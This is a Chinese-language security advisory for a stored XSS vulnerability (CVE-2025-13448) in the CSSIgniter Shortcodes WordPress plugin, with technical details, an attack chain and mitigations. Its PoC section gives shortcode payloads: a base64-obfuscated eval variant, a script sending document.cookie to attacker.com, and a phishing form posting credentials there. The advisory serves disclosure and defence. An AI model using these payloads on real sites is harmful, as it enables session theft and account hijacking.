CVE-2025-13448 WordPress CSSIgniter Shortcodes插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13448

漏洞类型

存储型跨站脚本攻击(Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CSSIgniter Shortcodes WordPress Plugin

漏洞概述

CSSIgniter Shortcodes是WordPress平台上一个广泛使用的短代码插件，提供了丰富的页面元素和设计组件。该插件在2.4.1及之前版本中存在严重的存储型跨站脚本(XSS)漏洞。漏洞根源在于插件对用户输入的'element'短代码属性缺乏充分的输入验证和输出编码处理。攻击者利用此漏洞可以通过在短代码中注入恶意JavaScript脚本，当其他用户访问包含恶意内容的页面时，注入的脚本将在受害者浏览器中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。由于WordPress的Contributor角色及以上权限用户均可使用短代码功能，攻击门槛相对较低，危害范围较广。此漏洞影响所有使用该插件的WordPress网站，需及时采取修复措施。

技术细节

漏洞存在于CSSIgniter Shortcodes插件的ci-shortcodes.php文件第117行附近。插件在处理[element]短代码时，直接将用户提供的element属性值输出到HTML页面而未进行任何转义处理。具体来说，当用户在短代码中插入恶意的element属性值时，如element='" onerror="alert(document.cookie)'，该值会被直接嵌入到HTML属性中而未经过htmlspecialchars()或其他适当的转义函数处理。由于WordPress的短代码机制会在页面渲染时自动解析并输出这些属性值，恶意脚本会被永久存储在数据库中。每次有用户访问包含该短代码的页面时，恶意脚本都会执行。攻击者可以利用此漏洞窃取管理员Cookie、进行CSRF攻击或在网站上注入钓鱼内容。攻击成功的前提是攻击者拥有WordPress的Contributor角色或更高权限账户。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的CSSIgniter Shortcodes插件版本，确认版本小于等于2.4.1

STEP 2

账户获取

攻击者通过社会工程、密码爆破或其他方式获取WordPress Contributor级别或更高权限的账户

STEP 3

恶意载荷构造

攻击者构造包含XSS payload的element短代码属性，使用<img>、<svg>或<script>标签注入JavaScript代码

STEP 4

漏洞利用

在文章或页面中插入恶意短代码，WordPress保存时将包含payload的内容存入数据库

STEP 5

持久化存储

恶意脚本作为页面内容的一部分永久存储在WordPress数据库中

STEP 6

受害者触发

任何访问该页面的用户浏览器会解析HTML并执行注入的JavaScript代码

STEP 7

数据窃取/账户劫持

恶意脚本执行后，可窃取用户Cookie、会话令牌或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- WordPress Contributor权限用户可通过以下方式注入XSS -->
<!-- 在页面或文章中插入恶意短代码 -->
[element type='text' element='<img src=x onerror=alert(document.cookie)>']

<!-- 绕过简单过滤的变体 -->
[element type='button' element='" onfocus="eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))" autofocus=']

<!-- 窃取用户会话的PoC -->
[element type='input' element='<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>']

<!-- 实际利用方式：构造钓鱼登录框 -->
[element element='<form action="https://attacker.com/phish"><input name="username"><input name="password" type="password"><button>Login</button></form>']

影响范围

CSSIgniter Shortcodes <= 2.4.1

防御指南

临时缓解措施

在官方发布修复版本之前，可采取以下临时缓解措施：1) 限制或禁用Contributor角色的文章发布权限；2) 使用WordPress安全插件(如Wordfence)添加XSS防护规则；3) 临时禁用CSSIgniter Shortcodes插件并使用替代方案；4) 部署严格的Content-Security-Policy响应头禁止内联脚本执行；5) 加强用户账户安全，使用强密码和双因素认证；6) 启用审计日志监控异常的内容创建和修改行为。